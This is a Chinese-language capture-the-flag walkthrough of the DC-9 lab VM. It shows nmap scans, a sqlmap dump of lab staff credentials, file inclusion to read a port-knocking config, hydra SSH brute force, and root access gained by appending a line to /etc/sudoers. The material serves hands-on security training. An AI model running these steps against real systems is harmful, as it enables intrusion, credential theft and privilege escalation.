arp-scan -I eth0 -l
发现靶机ip:192.168.10.132
└─# arp-scan -I eth0 -l
192.168.10.1 00:50:56:c0:00:08 (Unknown)
192.168.10.2 00:50:56:e5:b1:08 (Unknown)
192.168.10.132 //靶机 00:0c:29:a6:a5:cd (Unknown)
192.168.10.254 00:50:56:fd:0f:18 (Unknown)
nmap -sS -p- 192.168.10.132
└─# nmap -sS -p- 192.168.10.132
PORT STATE SERVICE
22/tcp filtered ssh //这个端口应该是被关闭了
80/tcp open http
MAC Address: 00:0C:29:A6:A5:CD (VMware)
nmap -sS -p 80,22 -sCV -O --version-all 192.168.10.132
└─# nmap -sS -p 80,22 -sCV -O --version-all 192.168.10.132
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:A6:A5:CD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
这个界面是真的像 drupal ,,这里提示我们在菜单上选择几个功能玩玩。
这里是展示所有的用户,,
这里是查找用户,可能有sql的查询语句,,这里可能存在SQL注入,我们开启bp看一下。
果然是存在SQL注入的,这里用 时间注入 的方法,放包后,页面确实延迟了5秒才显示。
那我们这里直接sqlmap一把梭。
└─# vim web.txt
┌──(root㉿kali)-[/home/kali/Desktop/DC-9]
└─# cat web.txt
POST /results.php HTTP/1.1
Host: 192.168.10.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://192.168.10.132
Connection: close
Referer: http://192.168.10.132/search.php
Cookie: PHPSESSID=2qd0b9ffsinjs8vsnnffcla2dm
Upgrade-Insecure-Requests: 1
search=Mary
└─# sqlmap -r web.txt --batch --level 5 --dbs
available databases [3]:
[*] information_schema
[*] Staff
[*] users
这里整理一下得到的信息,,
available databases [3]:
[*] information_schema
[*] Staff
[*] users
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+
Table: Users
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UserID | int(6) unsigned |
| Username | varchar(255) |
+----------+-----------------+
Table: Users
[1 entry]
admin/transorbital1
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+
---------------------------------------------------
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
我们把得到的所有信息存到字典里面,,以防要用。
我们先把在 Staff 得到的账密去登录后台看看,,这里说文件没有找到,我们考虑是文件做了变量,可能含有 文件包含 漏洞。
确实发现了文件包含漏洞 我们去跑跑配置文件看看有没有信息。
这里发现了几个关键的配置文件,, knock.conf。
靶机是用 kncok 去隐藏了端口,我们需要用对应的端口去敲门,敲门结束后对应关闭的端口就会开放。这也是一种系统加固的方法。
这里查看配置文件,开门的端口分别是:7469,8475,9842。
这里我们是有很多办法的,,可以安装knock工具敲门,也可以用 nmap 和 nc 去碰撞敲门,我们这里采用nmap分别对3个端口探测即可。
nmap -sS -p 7469,8475,9842 192.168.10.132
ok 破解出来了3个账密:
hydra -L users.list -P pass.list ssh://192.168.10.132
login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee
在janitor用户发现个密码本,,写到我们的字典上二次爆破,,发现新用户。
login: fredf password: B4-Tru3-00
切换到新发现的用户,,sudo -l 发现可以用 root 权限执行 test 文件。执行发现该文件是用python写的,查找一下test.py文件的路径,查看内容,,发现是将参数1的内容写到参数2里面去。
fredf@dc-9:~$ cat /opt/devstuff/test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()
这里其实有比较多的办法,可以利用计划任务提权,写进 /etc/passwd 里面提权,也可以写进sudoers组里面。
我们这里把 fredf 用户写进 sudoers 里面得到 ALL 权限,简单一点。
echo "fredf ALL=(ALL) ALL" > fredf
sudo /opt/devstuff/dist/test/test ~/fredf /etc/sudoers
sudo -l
-------------------------------------------
fredf@dc-9:~$ echo "fredf ALL=(ALL) ALL" > fredf
fredf@dc-9:~$ ls
fredf
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test ~/fredf /etc/sudoers
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
(ALL) ALL
fredf@dc-9:~$ sudo su root
[sudo] password for fredf:
root@dc-9:/home/fredf# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-9:/home/fredf# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
#includedir /etc/sudoers.d
fredf ALL=(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf ALL=(ALL) ALL
root@dc-9:/home/fredf# find / -name *flag.txt
/root/theflag.txt
root@dc-9:/home/fredf# cat /root/theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.